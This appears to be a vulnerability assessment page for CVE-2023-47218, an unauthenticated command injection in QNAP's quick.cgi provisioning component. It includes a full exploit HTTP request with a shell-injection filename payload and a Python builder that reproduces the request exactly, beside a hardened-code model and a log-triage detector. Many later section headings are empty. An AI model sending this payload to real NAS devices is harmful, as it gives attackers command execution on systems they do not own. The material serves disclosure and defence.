CVE-2023-47218
Attacker Value: Very High (1 user assessed)
Exploitability: Low (1 user assessed)
Description
An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.
We have already fixed the vulnerability in the following versions:
QTS 5.1.5.2645 build 20240116 and later
QuTS hero h5.1.5.2647 build 20240118 and later
QuTScloud c5.1.5.2651 and later
Assessment Ratings
Attacker Value: Very High
Exploitability: Low
Technical Analysis
An unauthenticated command injection vulnerability exists in the quick.cgi component of the web administration server for the QNAP QTS and QuTS hero operating systems, used by numerous QNAP NAS devices. The quick.cgi component exposes functionality to remotely provision a QNAP device. An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command injection.
The vulnerability affects QTS 5.1.x prior to the vendor patch QTS 5.1.5.2645 build 20240116, and QuTS hero h5.1.x prior to the vendor patch QuTS hero h5.1.5.2647 build 20240118.
An HTTP(S) POST request targeting the uploaf_firmware_image functionality of quick.cgi (spelled "uploaf" in the actual request parameter) can trigger a command injection vulnerability if the user agent contains both the words Mozilla and Macintosh. This is because a file name passed as part of the POST request's multipart form-data is URL decoded only when the user agent matches these two words. This allows a double quote character (URL encoded as %22) to be supplied as part of the file name, letting the attacker break out of a quoted command string so that command injection occurs.
An example request that exploits this vulnerability is as follows:
POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
Host: 192.168.86.42:8080
User-Agent: Mozilla Macintosh
Accept: */*
Content-Length: 164
Content-Type: multipart/form-data;boundary="avssqwfz"

--avssqwfz
Content-Disposition: form-data; xxpcscma="field2"; zczqildp="%22$($(echo -n aWQ=|base64 -d)>a)%22"
Content-Type: text/plain

skfqduny
--avssqwfz--
A detailed analysis and PoC can be found in our Rapid7 disclosure.
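The decode-then-quote behaviour described above, modelled in Python as an added example. This is not QNAP's code and not the Rapid7 PoC: quick.cgi is a native binary whose internals are not reproduced, so the command template, the upload directory and the function names are assumptions. The request builder reproduces the request above byte for byte (its body comes out at the Content-Length of 164 shown in that request), and the vulnerable and hardened functions show why the %22 only matters once the User-Agent switches URL decoding on, and what closes the hole.

```python
"""Model of the quick.cgi filename handling described above.

Added illustration, not QNAP's code and not the Rapid7 PoC: quick.cgi is a
native binary and its internals are not reproduced here. Only the behaviour
the analysis states is modelled: the multipart filename is URL-decoded when
the User-Agent contains both "Mozilla" and "Macintosh", and the result is
interpolated into a double-quoted shell string. The command template, the
upload directory and the function names are assumptions.
"""
import re
from urllib.parse import unquote

# Payload from the request above: %22 decodes to a double quote, $(...) runs
# `id` (base64 "aWQ=") and redirects its output into a file named "a".
PAGE_PAYLOAD = "%22$($(echo -n aWQ=|base64 -d)>a)%22"


def decode_filename(user_agent: str, raw_filename: str) -> str:
    """URL-decode the filename only for the user agents the analysis names."""
    if "Mozilla" in user_agent and "Macintosh" in user_agent:
        return unquote(raw_filename)
    return raw_filename


def build_command_vulnerable(user_agent: str, raw_filename: str) -> str:
    """Vulnerable pattern (assumed template): the decoded name is dropped into
    a double-quoted shell string. A literal " in the name closes the quoted
    argument and the shell parses whatever follows."""
    name = decode_filename(user_agent, raw_filename)
    return f'cp "/tmp/upload/{name}" /tmp/firmware.img'


def build_command_hardened(user_agent: str, raw_filename: str) -> list:
    """Hardened pattern: allow-list the basename, then return an argv list so
    no shell ever parses it (run with subprocess.run(argv), no shell=True).
    If a shell string is unavoidable, shlex.quote(name) is the fallback."""
    name = decode_filename(user_agent, raw_filename)
    if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}", name):
        raise ValueError(f"rejected filename: {name!r}")
    return ["cp", "/tmp/upload/" + name, "/tmp/firmware.img"]


def hardened_rejects(user_agent: str, raw_filename: str) -> bool:
    """True when the hardened path refuses the filename."""
    try:
        build_command_hardened(user_agent, raw_filename)
    except ValueError:
        return True
    return False


def build_request_body(boundary: str, raw_filename: str,
                       content: str = "skfqduny") -> bytes:
    """Multipart body in the exact layout of the request above. The PoC uses
    arbitrary parameter names (xxpcscma, zczqildp) rather than name= and
    filename=; this builder simply reproduces that layout."""
    lines = [
        f"--{boundary}",
        f'Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{raw_filename}"',
        "Content-Type: text/plain",
        "",
        content,
        f"--{boundary}--",
        "",
    ]
    return "\r\n".join(lines).encode()


def build_request(host: str, boundary: str, raw_filename: str) -> bytes:
    """Full request; the User-Agent deliberately carries both trigger words."""
    body = build_request_body(boundary, raw_filename)
    head = [
        "POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla Macintosh",
        "Accept: */*",
        f"Content-Length: {len(body)}",
        f'Content-Type: multipart/form-data;boundary="{boundary}"',
        "",
        "",
    ]
    return "\r\n".join(head).encode() + body


if __name__ == "__main__":
    print(build_request("192.168.86.42:8080", "avssqwfz", PAGE_PAYLOAD).decode())
    print("vulnerable:", build_command_vulnerable("Mozilla Macintosh", PAGE_PAYLOAD))
    print("other UA:  ", build_command_vulnerable("curl/8.4.0", PAGE_PAYLOAD))
    print("hardened rejects:", hardened_rejects("Mozilla Macintosh", PAGE_PAYLOAD))
```

Running it with a non-matching User-Agent leaves the literal %22 inside the quotes, which is why the trigger words matter: the same bytes on the wire mean a filename for one client and a shell fragment for another. The payload wraps the injected command in two %22 so the quotes in the assumed template stay balanced, which is the shape visible in the request above. The hardened variant fixes both halves of the problem: it refuses names outside a short allow-list, and it never hands the name to a shell at all.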
General Information
Vendors
- QNAP Systems Inc.
Products
- QTS
- QuTS hero
- QuTScloud
Technical Analysis
Let's delve deeper into the details of the QNAP QTS and QuTS hero unauthenticated remote code execution (RCE) vulnerability:
Vulnerability Overview
The vulnerability, identified by CVE-2023-47218, exposes an unauthenticated command injection risk within the QNAP operating systems QTS and QuTS hero. QTS is integral to the firmware of numerous entry and mid-level QNAP Network Attached Storage (NAS) devices, while QuTS hero plays a core role in high-end and enterprise-level NAS devices.
Vulnerable Component:
The flaw resides in the quick.cgi component, which is accessible through the device's web-based administration feature. This component, present in uninitialized QNAP NAS devices, is designed for manual or cloud-based provisioning during the NAS device's setup. Once the device is initialized successfully, quick.cgi is disabled. An attacker with network access to an uninitialized QNAP NAS device can leverage this vulnerability to perform unauthenticated command injection. This allows the attacker to execute arbitrary commands on the target device.
Exploit Details
Check Function: the check function sends a GET request to /cgi-bin/quick/quick.cgi. A response of <Result>failure</Result> confirms the vulnerability.
Exploit Function:
Payload Limitation:
Execute Command Function:
Upload File Function:
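A log-side view of the check and exploit requests described above, as an added example that is not part of this assessment or of the Rapid7 module: a small triage pass over web-server access-log lines that flags any hit on quick.cgi, escalates on the uploaf_firmware_image path, and notes when the User-Agent satisfies the decoding condition. The log format (Apache/NGINX "combined") and the sample lines are constructed, and the severity scheme is an assumption. One caveat it encodes: a genuine Safari User-Agent already contains both Mozilla and Macintosh, so the bare "Mozilla Macintosh" string fingerprints the public PoC, not the technique.

```python
"""Access-log triage for requests shaped like the quick.cgi check and exploit.

Added example; not part of the AttackerKB assessment or of Rapid7's PoC.
The "combined" log format and the sample lines are constructed for
illustration, and the severity scheme is an assumption.
"""
import re
from urllib.parse import parse_qs, urlsplit

QUICK_CGI = "/cgi-bin/quick/quick.cgi"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not real traffic): a probe like the check function,
# the public PoC shape, the same request behind a genuine Safari user agent,
# and unrelated traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Feb/2024:10:12:01 +0000] "GET /cgi-bin/quick/quick.cgi HTTP/1.1" 200 45 "-" "curl/8.4.0"',
    '10.0.0.5 - - [05/Feb/2024:10:12:07 +0000] "POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1" 200 98 "-" "Mozilla Macintosh"',
    '10.0.0.9 - - [05/Feb/2024:11:40:22 +0000] "POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1" 200 98 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"',
    '10.0.0.7 - - [05/Feb/2024:11:41:00 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 200 1201 "-" "curl/8.4.0"',
]


def classify(line: str):
    """Return None for traffic that does not touch quick.cgi, otherwise a dict
    with the source IP, an assumed severity and the reasons behind it."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path != QUICK_CGI:
        return None
    qs = parse_qs(url.query)
    ua = m["ua"]
    reasons = ["request reached quick.cgi (only expected on an uninitialized device)"]
    severity = "low"
    if m["method"] == "POST" and qs.get("todo") == ["uploaf_firmware_image"]:
        reasons.append("firmware-upload path of quick.cgi")
        severity = "medium"
        # The decoding that makes %22 dangerous is keyed on the UA. A real
        # Safari UA contains both words, so this is not a PoC-only signature.
        if "Mozilla" in ua and "Macintosh" in ua:
            reasons.append("user agent enables URL-decoding of the filename")
            severity = "high"
    if re.fullmatch(r"Mozilla\s+Macintosh", ua):
        reasons.append("bare 'Mozilla Macintosh' user agent matches the public PoC")
    return {"ip": m["ip"], "severity": severity, "reasons": reasons}


def triage(lines):
    """Worst hit per source IP, in a shape that can go straight to an IR queue."""
    order = {"low": 0, "medium": 1, "high": 2}
    worst = {}
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        current = worst.get(hit["ip"])
        if current is None or order[hit["severity"]] > order[current["severity"]]:
            worst[hit["ip"]] = hit
    return worst


if __name__ == "__main__":
    for ip, hit in sorted(triage(SAMPLE_LOG).items()):
        print(ip, hit["severity"], "; ".join(hit["reasons"]))
```

Access logs do not carry the request body, so the %22 itself is never visible here; the endpoint, the todo parameter and the User-Agent are what remain. Any hit on quick.cgi from a device that has been in service for a while is worth a look on its own, since the component is supposed to be disabled after initialization.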
Mitigations and Recommendations
Patch and Update:
Authentication Mechanisms:
Payload Length Limitation:
Payload Execution:
File Upload Security:
Network Access:
Post-Exploitation Cleanup:
This detailed analysis provides a comprehensive understanding of the vulnerability, its exploitation methods, and suggested mitigations to secure QNAP NAS devices from potential threats.
To prevent the QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution attack from recurring, consider implementing the following security measures:
Apply Vendor Patch:
Network Segmentation:
Strong Authentication:
Regular Security Audits:
Intrusion Detection Systems (IDS):
File Upload Restrictions:
Input Validation:
Least Privilege Principle:
Security Awareness Training:
Monitoring and Logging:
Incident Response Plan:
Penetration Testing:
Vendor Communication:
By implementing these preventive measures, organizations can significantly reduce the risk of similar unauthenticated remote code execution attacks and enhance the overall security posture of their QNAP NAS devices.